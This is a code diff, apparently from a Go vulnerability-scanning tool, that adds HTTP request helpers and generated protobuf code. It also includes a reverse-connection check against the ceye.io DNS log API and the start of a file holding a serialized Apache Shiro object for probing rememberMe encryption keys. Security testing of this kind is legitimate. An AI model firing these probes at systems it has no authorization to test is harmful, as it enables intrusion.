urlStr := fmt.Sprintf("http://api.ceye.io/v1/records?token=%s&type=dns&filter=%s", ceyeApi, sub)
|
||||
fmt.Println(urlStr)
|
||||
//fmt.Println(urlStr)
|
||||
req, _ := http.NewRequest("GET", urlStr, nil)
|
||||
resp, err := DoRequest(req, false)
|
||||
if err != nil {
|
||||
|
@ -445,7 +583,6 @@ func reverseCheck(r *Reverse, timeout int64) bool {
|
|||
return false
|
||||
}
|
||||
|
||||
|
||||
func RandomStr(randSource *rand.Rand, letterBytes string, n int) string {
|
||||
const (
|
||||
letterIdxBits = 6 // 6 bits to represent a letter index
|
||||
|
@ -467,3 +604,94 @@ func RandomStr(randSource *rand.Rand, letterBytes string, n int) string {
|
|||
}
|
||||
return string(randBytes)
|
||||
}
|
||||
|
||||
func DoRequest(req *http.Request, redirect bool) (*Response, error) {
|
||||
if req.Body == nil || req.Body == http.NoBody {
|
||||
} else {
|
||||
req.Header.Set("Content-Length", strconv.Itoa(int(req.ContentLength)))
|
||||
if req.Header.Get("Content-Type") == "" {
|
||||
req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
|
||||
}
|
||||
}
|
||||
var oResp *http.Response
|
||||
var err error
|
||||
if redirect {
|
||||
oResp, err = Client.Do(req)
|
||||
} else {
|
||||
oResp, err = ClientNoRedirect.Do(req)
|
||||
}
|
||||
if err != nil {
|
||||
//fmt.Println("[-]DoRequest error: ",err)
|
||||
return nil, err
|
||||
}
|
||||
defer oResp.Body.Close()
|
||||
resp, err := ParseResponse(oResp)
|
||||
if err != nil {
|
||||
common.LogError("[-] ParseResponse error: " + err.Error())
|
||||
//return nil, err
|
||||
}
|
||||
return resp, err
|
||||
}
|
||||
|
||||
func ParseUrl(u *url.URL) *UrlType {
|
||||
nu := &UrlType{}
|
||||
nu.Scheme = u.Scheme
|
||||
nu.Domain = u.Hostname()
|
||||
nu.Host = u.Host
|
||||
nu.Port = u.Port()
|
||||
nu.Path = u.EscapedPath()
|
||||
nu.Query = u.RawQuery
|
||||
nu.Fragment = u.Fragment
|
||||
return nu
|
||||
}
|
||||
|
||||
func ParseRequest(oReq *http.Request) (*Request, error) {
|
||||
req := &Request{}
|
||||
req.Method = oReq.Method
|
||||
req.Url = ParseUrl(oReq.URL)
|
||||
header := make(map[string]string)
|
||||
for k := range oReq.Header {
|
||||
header[k] = oReq.Header.Get(k)
|
||||
}
|
||||
req.Headers = header
|
||||
req.ContentType = oReq.Header.Get("Content-Type")
|
||||
if oReq.Body == nil || oReq.Body == http.NoBody {
|
||||
} else {
|
||||
data, err := ioutil.ReadAll(oReq.Body)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
req.Body = data
|
||||
oReq.Body = ioutil.NopCloser(bytes.NewBuffer(data))
|
||||
}
|
||||
return req, nil
|
||||
}
|
||||
|
||||
func ParseResponse(oResp *http.Response) (*Response, error) {
|
||||
var resp Response
|
||||
header := make(map[string]string)
|
||||
resp.Status = int32(oResp.StatusCode)
|
||||
resp.Url = ParseUrl(oResp.Request.URL)
|
||||
for k := range oResp.Header {
|
||||
header[k] = strings.Join(oResp.Header.Values(k), ";")
|
||||
}
|
||||
resp.Headers = header
|
||||
resp.ContentType = oResp.Header.Get("Content-Type")
|
||||
body, err := getRespBody(oResp)
|
||||
resp.Body = body
|
||||
return &resp, err
|
||||
}
|
||||
|
||||
func getRespBody(oResp *http.Response) (body []byte, err error) {
|
||||
body, err = io.ReadAll(oResp.Body)
|
||||
if strings.Contains(oResp.Header.Get("Content-Encoding"), "gzip") {
|
||||
reader, err1 := gzip.NewReader(bytes.NewReader(body))
|
||||
if err1 == nil {
|
||||
body, err = io.ReadAll(reader)
|
||||
}
|
||||
}
|
||||
if err == io.EOF {
|
||||
err = nil
|
||||
}
|
||||
return
|
||||
}
|
|
@ -0,0 +1,520 @@
|
|||
//go:generate protoc --go_out=. http.proto
|
||||
|
||||
// Code generated by protoc-gen-go. DO NOT EDIT.
|
||||
// versions:
|
||||
// protoc-gen-go v1.26.0
|
||||
// protoc v3.20.3
|
||||
// source: http.proto
|
||||
|
||||
package lib
|
||||
|
||||
import (
|
||||
protoreflect "google.golang.org/protobuf/reflect/protoreflect"
|
||||
protoimpl "google.golang.org/protobuf/runtime/protoimpl"
|
||||
reflect "reflect"
|
||||
sync "sync"
|
||||
)
|
||||
|
||||
const (
|
||||
// Verify that this generated code is sufficiently up-to-date.
|
||||
_ = protoimpl.EnforceVersion(20 - protoimpl.MinVersion)
|
||||
// Verify that runtime/protoimpl is sufficiently up-to-date.
|
||||
_ = protoimpl.EnforceVersion(protoimpl.MaxVersion - 20)
|
||||
)
|
||||
|
||||
type UrlType struct {
|
||||
state protoimpl.MessageState
|
||||
sizeCache protoimpl.SizeCache
|
||||
unknownFields protoimpl.UnknownFields
|
||||
|
||||
Scheme string `protobuf:"bytes,1,opt,name=scheme,proto3" json:"scheme,omitempty"`
|
||||
Domain string `protobuf:"bytes,2,opt,name=domain,proto3" json:"domain,omitempty"`
|
||||
Host string `protobuf:"bytes,3,opt,name=host,proto3" json:"host,omitempty"`
|
||||
Port string `protobuf:"bytes,4,opt,name=port,proto3" json:"port,omitempty"`
|
||||
Path string `protobuf:"bytes,5,opt,name=path,proto3" json:"path,omitempty"`
|
||||
Query string `protobuf:"bytes,6,opt,name=query,proto3" json:"query,omitempty"`
|
||||
Fragment string `protobuf:"bytes,7,opt,name=fragment,proto3" json:"fragment,omitempty"`
|
||||
}
|
||||
|
||||
func (x *UrlType) Reset() {
|
||||
*x = UrlType{}
|
||||
if protoimpl.UnsafeEnabled {
|
||||
mi := &file_http_proto_msgTypes[0]
|
||||
ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
|
||||
ms.StoreMessageInfo(mi)
|
||||
}
|
||||
}
|
||||
|
||||
func (x *UrlType) String() string {
|
||||
return protoimpl.X.MessageStringOf(x)
|
||||
}
|
||||
|
||||
func (*UrlType) ProtoMessage() {}
|
||||
|
||||
func (x *UrlType) ProtoReflect() protoreflect.Message {
|
||||
mi := &file_http_proto_msgTypes[0]
|
||||
if protoimpl.UnsafeEnabled && x != nil {
|
||||
ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
|
||||
if ms.LoadMessageInfo() == nil {
|
||||
ms.StoreMessageInfo(mi)
|
||||
}
|
||||
return ms
|
||||
}
|
||||
return mi.MessageOf(x)
|
||||
}
|
||||
|
||||
// Deprecated: Use UrlType.ProtoReflect.Descriptor instead.
|
||||
func (*UrlType) Descriptor() ([]byte, []int) {
|
||||
return file_http_proto_rawDescGZIP(), []int{0}
|
||||
}
|
||||
|
||||
func (x *UrlType) GetScheme() string {
|
||||
if x != nil {
|
||||
return x.Scheme
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func (x *UrlType) GetDomain() string {
|
||||
if x != nil {
|
||||
return x.Domain
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func (x *UrlType) GetHost() string {
|
||||
if x != nil {
|
||||
return x.Host
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func (x *UrlType) GetPort() string {
|
||||
if x != nil {
|
||||
return x.Port
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func (x *UrlType) GetPath() string {
|
||||
if x != nil {
|
||||
return x.Path
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func (x *UrlType) GetQuery() string {
|
||||
if x != nil {
|
||||
return x.Query
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func (x *UrlType) GetFragment() string {
|
||||
if x != nil {
|
||||
return x.Fragment
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
type Request struct {
|
||||
state protoimpl.MessageState
|
||||
sizeCache protoimpl.SizeCache
|
||||
unknownFields protoimpl.UnknownFields
|
||||
|
||||
Url *UrlType `protobuf:"bytes,1,opt,name=url,proto3" json:"url,omitempty"`
|
||||
Method string `protobuf:"bytes,2,opt,name=method,proto3" json:"method,omitempty"`
|
||||
Headers map[string]string `protobuf:"bytes,3,rep,name=headers,proto3" json:"headers,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
|
||||
ContentType string `protobuf:"bytes,4,opt,name=content_type,json=contentType,proto3" json:"content_type,omitempty"`
|
||||
Body []byte `protobuf:"bytes,5,opt,name=body,proto3" json:"body,omitempty"`
|
||||
}
|
||||
|
||||
func (x *Request) Reset() {
|
||||
*x = Request{}
|
||||
if protoimpl.UnsafeEnabled {
|
||||
mi := &file_http_proto_msgTypes[1]
|
||||
ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
|
||||
ms.StoreMessageInfo(mi)
|
||||
}
|
||||
}
|
||||
|
||||
func (x *Request) String() string {
|
||||
return protoimpl.X.MessageStringOf(x)
|
||||
}
|
||||
|
||||
func (*Request) ProtoMessage() {}
|
||||
|
||||
func (x *Request) ProtoReflect() protoreflect.Message {
|
||||
mi := &file_http_proto_msgTypes[1]
|
||||
if protoimpl.UnsafeEnabled && x != nil {
|
||||
ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
|
||||
if ms.LoadMessageInfo() == nil {
|
||||
ms.StoreMessageInfo(mi)
|
||||
}
|
||||
return ms
|
||||
}
|
||||
return mi.MessageOf(x)
|
||||
}
|
||||
|
||||
// Deprecated: Use Request.ProtoReflect.Descriptor instead.
|
||||
func (*Request) Descriptor() ([]byte, []int) {
|
||||
return file_http_proto_rawDescGZIP(), []int{1}
|
||||
}
|
||||
|
||||
func (x *Request) GetUrl() *UrlType {
|
||||
if x != nil {
|
||||
return x.Url
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (x *Request) GetMethod() string {
|
||||
if x != nil {
|
||||
return x.Method
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func (x *Request) GetHeaders() map[string]string {
|
||||
if x != nil {
|
||||
return x.Headers
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (x *Request) GetContentType() string {
|
||||
if x != nil {
|
||||
return x.ContentType
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func (x *Request) GetBody() []byte {
|
||||
if x != nil {
|
||||
return x.Body
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
type Response struct {
|
||||
state protoimpl.MessageState
|
||||
sizeCache protoimpl.SizeCache
|
||||
unknownFields protoimpl.UnknownFields
|
||||
|
||||
Url *UrlType `protobuf:"bytes,1,opt,name=url,proto3" json:"url,omitempty"`
|
||||
Status int32 `protobuf:"varint,2,opt,name=status,proto3" json:"status,omitempty"`
|
||||
Headers map[string]string `protobuf:"bytes,3,rep,name=headers,proto3" json:"headers,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
|
||||
ContentType string `protobuf:"bytes,4,opt,name=content_type,json=contentType,proto3" json:"content_type,omitempty"`
|
||||
Body []byte `protobuf:"bytes,5,opt,name=body,proto3" json:"body,omitempty"`
|
||||
Duration float64 `protobuf:"fixed64,6,opt,name=duration,proto3" json:"duration,omitempty"`
|
||||
}
|
||||
|
||||
func (x *Response) Reset() {
|
||||
*x = Response{}
|
||||
if protoimpl.UnsafeEnabled {
|
||||
mi := &file_http_proto_msgTypes[2]
|
||||
ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
|
||||
ms.StoreMessageInfo(mi)
|
||||
}
|
||||
}
|
||||
|
||||
func (x *Response) String() string {
|
||||
return protoimpl.X.MessageStringOf(x)
|
||||
}
|
||||
|
||||
func (*Response) ProtoMessage() {}
|
||||
|
||||
func (x *Response) ProtoReflect() protoreflect.Message {
|
||||
mi := &file_http_proto_msgTypes[2]
|
||||
if protoimpl.UnsafeEnabled && x != nil {
|
||||
ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
|
||||
if ms.LoadMessageInfo() == nil {
|
||||
ms.StoreMessageInfo(mi)
|
||||
}
|
||||
return ms
|
||||
}
|
||||
return mi.MessageOf(x)
|
||||
}
|
||||
|
||||
// Deprecated: Use Response.ProtoReflect.Descriptor instead.
|
||||
func (*Response) Descriptor() ([]byte, []int) {
|
||||
return file_http_proto_rawDescGZIP(), []int{2}
|
||||
}
|
||||
|
||||
func (x *Response) GetUrl() *UrlType {
|
||||
if x != nil {
|
||||
return x.Url
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (x *Response) GetStatus() int32 {
|
||||
if x != nil {
|
||||
return x.Status
|
||||
}
|
||||
return 0
|
||||
}
|
||||
|
||||
func (x *Response) GetHeaders() map[string]string {
|
||||
if x != nil {
|
||||
return x.Headers
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (x *Response) GetContentType() string {
|
||||
if x != nil {
|
||||
return x.ContentType
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func (x *Response) GetBody() []byte {
|
||||
if x != nil {
|
||||
return x.Body
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (x *Response) GetDuration() float64 {
|
||||
if x != nil {
|
||||
return x.Duration
|
||||
}
|
||||
return 0
|
||||
}
|
||||
|
||||
type Reverse struct {
|
||||
state protoimpl.MessageState
|
||||
sizeCache protoimpl.SizeCache
|
||||
unknownFields protoimpl.UnknownFields
|
||||
|
||||
Url string `protobuf:"bytes,1,opt,name=url,proto3" json:"url,omitempty"`
|
||||
Domain string `protobuf:"bytes,2,opt,name=domain,proto3" json:"domain,omitempty"`
|
||||
Ip string `protobuf:"bytes,3,opt,name=ip,proto3" json:"ip,omitempty"`
|
||||
IsDomainNameServer bool `protobuf:"varint,4,opt,name=is_domain_name_server,json=isDomainNameServer,proto3" json:"is_domain_name_server,omitempty"`
|
||||
}
|
||||
|
||||
func (x *Reverse) Reset() {
|
||||
*x = Reverse{}
|
||||
if protoimpl.UnsafeEnabled {
|
||||
mi := &file_http_proto_msgTypes[3]
|
||||
ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
|
||||
ms.StoreMessageInfo(mi)
|
||||
}
|
||||
}
|
||||
|
||||
func (x *Reverse) String() string {
|
||||
return protoimpl.X.MessageStringOf(x)
|
||||
}
|
||||
|
||||
func (*Reverse) ProtoMessage() {}
|
||||
|
||||
func (x *Reverse) ProtoReflect() protoreflect.Message {
|
||||
mi := &file_http_proto_msgTypes[3]
|
||||
if protoimpl.UnsafeEnabled && x != nil {
|
||||
ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x))
|
||||
if ms.LoadMessageInfo() == nil {
|
||||
ms.StoreMessageInfo(mi)
|
||||
}
|
||||
return ms
|
||||
}
|
||||
return mi.MessageOf(x)
|
||||
}
|
||||
|
||||
// Deprecated: Use Reverse.ProtoReflect.Descriptor instead.
|
||||
func (*Reverse) Descriptor() ([]byte, []int) {
|
||||
return file_http_proto_rawDescGZIP(), []int{3}
|
||||
}
|
||||
|
||||
func (x *Reverse) GetUrl() string {
|
||||
if x != nil {
|
||||
return x.Url
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func (x *Reverse) GetDomain() string {
|
||||
if x != nil {
|
||||
return x.Domain
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func (x *Reverse) GetIp() string {
|
||||
if x != nil {
|
||||
return x.Ip
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func (x *Reverse) GetIsDomainNameServer() bool {
|
||||
if x != nil {
|
||||
return x.IsDomainNameServer
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
var File_http_proto protoreflect.FileDescriptor
|
||||
|
||||
var file_http_proto_rawDesc = []byte{
|
||||
0x0a, 0x0a, 0x68, 0x74, 0x74, 0x70, 0x2e, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x12, 0x03, 0x6c, 0x69,
|
||||
0x62, 0x22, 0xa7, 0x01, 0x0a, 0x07, 0x55, 0x72, 0x6c, 0x54, 0x79, 0x70, 0x65, 0x12, 0x16, 0x0a,
|
||||
0x06, 0x73, 0x63, 0x68, 0x65, 0x6d, 0x65, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x06, 0x73,
|
||||
0x63, 0x68, 0x65, 0x6d, 0x65, 0x12, 0x16, 0x0a, 0x06, 0x64, 0x6f, 0x6d, 0x61, 0x69, 0x6e, 0x18,
|
||||
0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x06, 0x64, 0x6f, 0x6d, 0x61, 0x69, 0x6e, 0x12, 0x12, 0x0a,
|
||||
0x04, 0x68, 0x6f, 0x73, 0x74, 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x68, 0x6f, 0x73,
|
||||
0x74, 0x12, 0x12, 0x0a, 0x04, 0x70, 0x6f, 0x72, 0x74, 0x18, 0x04, 0x20, 0x01, 0x28, 0x09, 0x52,
|
||||
0x04, 0x70, 0x6f, 0x72, 0x74, 0x12, 0x12, 0x0a, 0x04, 0x70, 0x61, 0x74, 0x68, 0x18, 0x05, 0x20,
|
||||
0x01, 0x28, 0x09, 0x52, 0x04, 0x70, 0x61, 0x74, 0x68, 0x12, 0x14, 0x0a, 0x05, 0x71, 0x75, 0x65,
|
||||
0x72, 0x79, 0x18, 0x06, 0x20, 0x01, 0x28, 0x09, 0x52, 0x05, 0x71, 0x75, 0x65, 0x72, 0x79, 0x12,
|
||||
0x1a, 0x0a, 0x08, 0x66, 0x72, 0x61, 0x67, 0x6d, 0x65, 0x6e, 0x74, 0x18, 0x07, 0x20, 0x01, 0x28,
|
||||
0x09, 0x52, 0x08, 0x66, 0x72, 0x61, 0x67, 0x6d, 0x65, 0x6e, 0x74, 0x22, 0xe9, 0x01, 0x0a, 0x07,
|
||||
0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x12, 0x1e, 0x0a, 0x03, 0x75, 0x72, 0x6c, 0x18, 0x01,
|
||||
0x20, 0x01, 0x28, 0x0b, 0x32, 0x0c, 0x2e, 0x6c, 0x69, 0x62, 0x2e, 0x55, 0x72, 0x6c, 0x54, 0x79,
|
||||
0x70, 0x65, 0x52, 0x03, 0x75, 0x72, 0x6c, 0x12, 0x16, 0x0a, 0x06, 0x6d, 0x65, 0x74, 0x68, 0x6f,
|
||||
0x64, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x06, 0x6d, 0x65, 0x74, 0x68, 0x6f, 0x64, 0x12,
|
||||
0x33, 0x0a, 0x07, 0x68, 0x65, 0x61, 0x64, 0x65, 0x72, 0x73, 0x18, 0x03, 0x20, 0x03, 0x28, 0x0b,
|
||||
0x32, 0x19, 0x2e, 0x6c, 0x69, 0x62, 0x2e, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x2e, 0x48,
|
||||
0x65, 0x61, 0x64, 0x65, 0x72, 0x73, 0x45, 0x6e, 0x74, 0x72, 0x79, 0x52, 0x07, 0x68, 0x65, 0x61,
|
||||
0x64, 0x65, 0x72, 0x73, 0x12, 0x21, 0x0a, 0x0c, 0x63, 0x6f, 0x6e, 0x74, 0x65, 0x6e, 0x74, 0x5f,
|
||||
0x74, 0x79, 0x70, 0x65, 0x18, 0x04, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0b, 0x63, 0x6f, 0x6e, 0x74,
|
||||
0x65, 0x6e, 0x74, 0x54, 0x79, 0x70, 0x65, 0x12, 0x12, 0x0a, 0x04, 0x62, 0x6f, 0x64, 0x79, 0x18,
|
||||
0x05, 0x20, 0x01, 0x28, 0x0c, 0x52, 0x04, 0x62, 0x6f, 0x64, 0x79, 0x1a, 0x3a, 0x0a, 0x0c, 0x48,
|
||||
0x65, 0x61, 0x64, 0x65, 0x72, 0x73, 0x45, 0x6e, 0x74, 0x72, 0x79, 0x12, 0x10, 0x0a, 0x03, 0x6b,
|
||||
0x65, 0x79, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x03, 0x6b, 0x65, 0x79, 0x12, 0x14, 0x0a,
|
||||
0x05, 0x76, 0x61, 0x6c, 0x75, 0x65, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x05, 0x76, 0x61,
|
||||
0x6c, 0x75, 0x65, 0x3a, 0x02, 0x38, 0x01, 0x22, 0x87, 0x02, 0x0a, 0x08, 0x52, 0x65, 0x73, 0x70,
|
||||
0x6f, 0x6e, 0x73, 0x65, 0x12, 0x1e, 0x0a, 0x03, 0x75, 0x72, 0x6c, 0x18, 0x01, 0x20, 0x01, 0x28,
|
||||
0x0b, 0x32, 0x0c, 0x2e, 0x6c, 0x69, 0x62, 0x2e, 0x55, 0x72, 0x6c, 0x54, 0x79, 0x70, 0x65, 0x52,
|
||||
0x03, 0x75, 0x72, 0x6c, 0x12, 0x16, 0x0a, 0x06, 0x73, 0x74, 0x61, 0x74, 0x75, 0x73, 0x18, 0x02,
|
||||
0x20, 0x01, 0x28, 0x05, 0x52, 0x06, 0x73, 0x74, 0x61, 0x74, 0x75, 0x73, 0x12, 0x34, 0x0a, 0x07,
|
||||
0x68, 0x65, 0x61, 0x64, 0x65, 0x72, 0x73, 0x18, 0x03, 0x20, 0x03, 0x28, 0x0b, 0x32, 0x1a, 0x2e,
|
||||
0x6c, 0x69, 0x62, 0x2e, 0x52, 0x65, 0x73, 0x70, 0x6f, 0x6e, 0x73, 0x65, 0x2e, 0x48, 0x65, 0x61,
|
||||
0x64, 0x65, 0x72, 0x73, 0x45, 0x6e, 0x74, 0x72, 0x79, 0x52, 0x07, 0x68, 0x65, 0x61, 0x64, 0x65,
|
||||
0x72, 0x73, 0x12, 0x21, 0x0a, 0x0c, 0x63, 0x6f, 0x6e, 0x74, 0x65, 0x6e, 0x74, 0x5f, 0x74, 0x79,
|
||||
0x70, 0x65, 0x18, 0x04, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0b, 0x63, 0x6f, 0x6e, 0x74, 0x65, 0x6e,
|
||||
0x74, 0x54, 0x79, 0x70, 0x65, 0x12, 0x12, 0x0a, 0x04, 0x62, 0x6f, 0x64, 0x79, 0x18, 0x05, 0x20,
|
||||
0x01, 0x28, 0x0c, 0x52, 0x04, 0x62, 0x6f, 0x64, 0x79, 0x12, 0x1a, 0x0a, 0x08, 0x64, 0x75, 0x72,
|
||||
0x61, 0x74, 0x69, 0x6f, 0x6e, 0x18, 0x06, 0x20, 0x01, 0x28, 0x01, 0x52, 0x08, 0x64, 0x75, 0x72,
|
||||
0x61, 0x74, 0x69, 0x6f, 0x6e, 0x1a, 0x3a, 0x0a, 0x0c, 0x48, 0x65, 0x61, 0x64, 0x65, 0x72, 0x73,
|
||||
0x45, 0x6e, 0x74, 0x72, 0x79, 0x12, 0x10, 0x0a, 0x03, 0x6b, 0x65, 0x79, 0x18, 0x01, 0x20, 0x01,
|
||||
0x28, 0x09, 0x52, 0x03, 0x6b, 0x65, 0x79, 0x12, 0x14, 0x0a, 0x05, 0x76, 0x61, 0x6c, 0x75, 0x65,
|
||||
0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x05, 0x76, 0x61, 0x6c, 0x75, 0x65, 0x3a, 0x02, 0x38,
|
||||
0x01, 0x22, 0x76, 0x0a, 0x07, 0x52, 0x65, 0x76, 0x65, 0x72, 0x73, 0x65, 0x12, 0x10, 0x0a, 0x03,
|
||||
0x75, 0x72, 0x6c, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x03, 0x75, 0x72, 0x6c, 0x12, 0x16,
|
||||
0x0a, 0x06, 0x64, 0x6f, 0x6d, 0x61, 0x69, 0x6e, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x06,
|
||||
0x64, 0x6f, 0x6d, 0x61, 0x69, 0x6e, 0x12, 0x0e, 0x0a, 0x02, 0x69, 0x70, 0x18, 0x03, 0x20, 0x01,
|
||||
0x28, 0x09, 0x52, 0x02, 0x69, 0x70, 0x12, 0x31, 0x0a, 0x15, 0x69, 0x73, 0x5f, 0x64, 0x6f, 0x6d,
|
||||
0x61, 0x69, 0x6e, 0x5f, 0x6e, 0x61, 0x6d, 0x65, 0x5f, 0x73, 0x65, 0x72, 0x76, 0x65, 0x72, 0x18,
|
||||
0x04, 0x20, 0x01, 0x28, 0x08, 0x52, 0x12, 0x69, 0x73, 0x44, 0x6f, 0x6d, 0x61, 0x69, 0x6e, 0x4e,
|
||||
0x61, 0x6d, 0x65, 0x53, 0x65, 0x72, 0x76, 0x65, 0x72, 0x42, 0x08, 0x5a, 0x06, 0x2e, 0x2f, 0x3b,
|
||||
0x6c, 0x69, 0x62, 0x62, 0x06, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x33,
|
||||
}
|
||||
|
||||
var (
|
||||
file_http_proto_rawDescOnce sync.Once
|
||||
file_http_proto_rawDescData = file_http_proto_rawDesc
|
||||
)
|
||||
|
||||
func file_http_proto_rawDescGZIP() []byte {
|
||||
file_http_proto_rawDescOnce.Do(func() {
|
||||
file_http_proto_rawDescData = protoimpl.X.CompressGZIP(file_http_proto_rawDescData)
|
||||
})
|
||||
return file_http_proto_rawDescData
|
||||
}
|
||||
|
||||
var file_http_proto_msgTypes = make([]protoimpl.MessageInfo, 6)
|
||||
var file_http_proto_goTypes = []interface{}{
|
||||
(*UrlType)(nil), // 0: lib.UrlType
|
||||
(*Request)(nil), // 1: lib.Request
|
||||
(*Response)(nil), // 2: lib.Response
|
||||
(*Reverse)(nil), // 3: lib.Reverse
|
||||
nil, // 4: lib.Request.HeadersEntry
|
||||
nil, // 5: lib.Response.HeadersEntry
|
||||
}
|
||||
var file_http_proto_depIdxs = []int32{
|
||||
0, // 0: lib.Request.url:type_name -> lib.UrlType
|
||||
4, // 1: lib.Request.headers:type_name -> lib.Request.HeadersEntry
|
||||
0, // 2: lib.Response.url:type_name -> lib.UrlType
|
||||
5, // 3: lib.Response.headers:type_name -> lib.Response.HeadersEntry
|
||||
4, // [4:4] is the sub-list for method output_type
|
||||
4, // [4:4] is the sub-list for method input_type
|
||||
4, // [4:4] is the sub-list for extension type_name
|
||||
4, // [4:4] is the sub-list for extension extendee
|
||||
0, // [0:4] is the sub-list for field type_name
|
||||
}
|
||||
|
||||
func init() { file_http_proto_init() }
|
||||
func file_http_proto_init() {
|
||||
if File_http_proto != nil {
|
||||
return
|
||||
}
|
||||
if !protoimpl.UnsafeEnabled {
|
||||
file_http_proto_msgTypes[0].Exporter = func(v interface{}, i int) interface{} {
|
||||
switch v := v.(*UrlType); i {
|
||||
case 0:
|
||||
return &v.state
|
||||
case 1:
|
||||
return &v.sizeCache
|
||||
case 2:
|
||||
return &v.unknownFields
|
||||
default:
|
||||
return nil
|
||||
}
|
||||
}
|
||||
file_http_proto_msgTypes[1].Exporter = func(v interface{}, i int) interface{} {
|
||||
switch v := v.(*Request); i {
|
||||
case 0:
|
||||
return &v.state
|
||||
case 1:
|
||||
return &v.sizeCache
|
||||
case 2:
|
||||
return &v.unknownFields
|
||||
default:
|
||||
return nil
|
||||
}
|
||||
}
|
||||
file_http_proto_msgTypes[2].Exporter = func(v interface{}, i int) interface{} {
|
||||
switch v := v.(*Response); i {
|
||||
case 0:
|
||||
return &v.state
|
||||
case 1:
|
||||
return &v.sizeCache
|
||||
case 2:
|
||||
return &v.unknownFields
|
||||
default:
|
||||
return nil
|
||||
}
|
||||
}
|
||||
file_http_proto_msgTypes[3].Exporter = func(v interface{}, i int) interface{} {
|
||||
switch v := v.(*Reverse); i {
|
||||
case 0:
|
||||
return &v.state
|
||||
case 1:
|
||||
return &v.sizeCache
|
||||
case 2:
|
||||
return &v.unknownFields
|
||||
default:
|
||||
return nil
|
||||
}
|
||||
}
|
||||
}
|
||||
type x struct{}
|
||||
out := protoimpl.TypeBuilder{
|
||||
File: protoimpl.DescBuilder{
|
||||
GoPackagePath: reflect.TypeOf(x{}).PkgPath(),
|
||||
RawDescriptor: file_http_proto_rawDesc,
|
||||
NumEnums: 0,
|
||||
NumMessages: 6,
|
||||
NumExtensions: 0,
|
||||
NumServices: 0,
|
||||
},
|
||||
GoTypes: file_http_proto_goTypes,
|
||||
DependencyIndexes: file_http_proto_depIdxs,
|
||||
MessageInfos: file_http_proto_msgTypes,
|
||||
}.Build()
|
||||
File_http_proto = out.File
|
||||
file_http_proto_rawDesc = nil
|
||||
file_http_proto_goTypes = nil
|
||||
file_http_proto_depIdxs = nil
|
||||
}
|
|
@ -1,6 +1,8 @@
|
|||
syntax = "proto3";
|
||||
package lib;
|
||||
|
||||
option go_package = "./;lib";
|
||||
|
||||
message UrlType {
|
||||
string scheme = 1;
|
||||
string domain = 2;
|
||||
|
@ -25,10 +27,11 @@ message Response {
|
|||
map<string, string> headers = 3;
|
||||
string content_type = 4;
|
||||
bytes body = 5;
|
||||
double duration = 6;
|
||||
}
|
||||
|
||||
message Reverse {
|
||||
UrlType url = 1;
|
||||
string url = 1;
|
||||
string domain = 2;
|
||||
string ip = 3;
|
||||
bool is_domain_name_server = 4;
|
|
@ -0,0 +1,73 @@
|
|||
package lib
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"crypto/aes"
|
||||
"crypto/cipher"
|
||||
"crypto/rand"
|
||||
"encoding/base64"
|
||||
"io"
|
||||
|
||||
uuid "github.com/satori/go.uuid"
|
||||
)
|
||||
|
||||
var (
|
||||
CheckContent = "rO0ABXNyADJvcmcuYXBhY2hlLnNoaXJvLnN1YmplY3QuU2ltcGxlUHJpbmNpcGFsQ29sbGVjdGlvbqh/WCXGowhKAwABTAAPcmVhbG1QcmluY2lwYWxzdAAPTGphdmEvdXRpbC9NYXA7eHBwdwEAeA=="
|
||||
Content, _ = base64.StdEncoding.DecodeString(CheckContent)
|
||||
)
|
||||
|
||||
